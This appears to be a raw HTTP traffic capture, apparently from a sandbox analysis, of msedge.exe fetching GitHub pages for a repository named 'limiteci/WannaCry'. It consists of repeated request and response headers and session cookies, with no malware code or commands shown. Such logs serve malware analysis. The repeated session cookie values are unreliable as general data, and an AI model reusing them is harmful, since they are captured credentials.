cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:23 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"089f60a79b55886e977959f90bbed257"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: 269915f5358aad939bb8e8b6eaca3df5464a42e9a89c842273a019331490dd05
accept-ranges: bytes
content-length: 70
x-github-request-id: C454:298401:186D59:1B6EB7:67117BD7
GET

https://github.com/limiteci/WannaCry/sponsors_list?block_button=false&current_repository=WannaCry

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/sponsors_list?block_button=false&current_repository=WannaCry HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:24 GMT
content-type: text/plain; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 20
x-github-request-id: C454:298401:186D59:1B6EB8:67117BD7
GET

https://github.com/limiteci/WannaCry/used_by_list

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/used_by_list HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/fragment+html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:24 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"702e72840bdf06a8828df83f54b96b8c"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: 269915f5358aad939bb8e8b6eaca3df5464a42e9a89c842273a019331490dd05
accept-ranges: bytes
content-length: 1311
x-github-request-id: C454:298401:186D59:1B6EB4:67117BD6
GET

https://github.com/limiteci/WannaCry/latest-commit/main

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/latest-commit/main HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:24 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"fc30e9cfef8b13b99c08674597917171"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 82
x-github-request-id: C454:298401:186D5F:1B6ECB:67117BD7
GET

https://github.com/limiteci/WannaCry/refs?type=branch

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/refs?type=branch HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: application/json
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:24 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"57dd3ff551f8b3d10b3856a048bab63c"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 53
x-github-request-id: C454:298401:186D5F:1B6ECE:67117BD7
GET

https://github.com/limiteci/WannaCry/tree-commit-info/main

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/tree-commit-info/main HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:24 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"b4b415f5f2170d349343e4406f019a45"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 13916
x-github-request-id: C454:298401:186D5F:1B6ECD:67117BD7
GET

https://github.com/limiteci/WannaCry/overview-files/main

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/overview-files/main HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
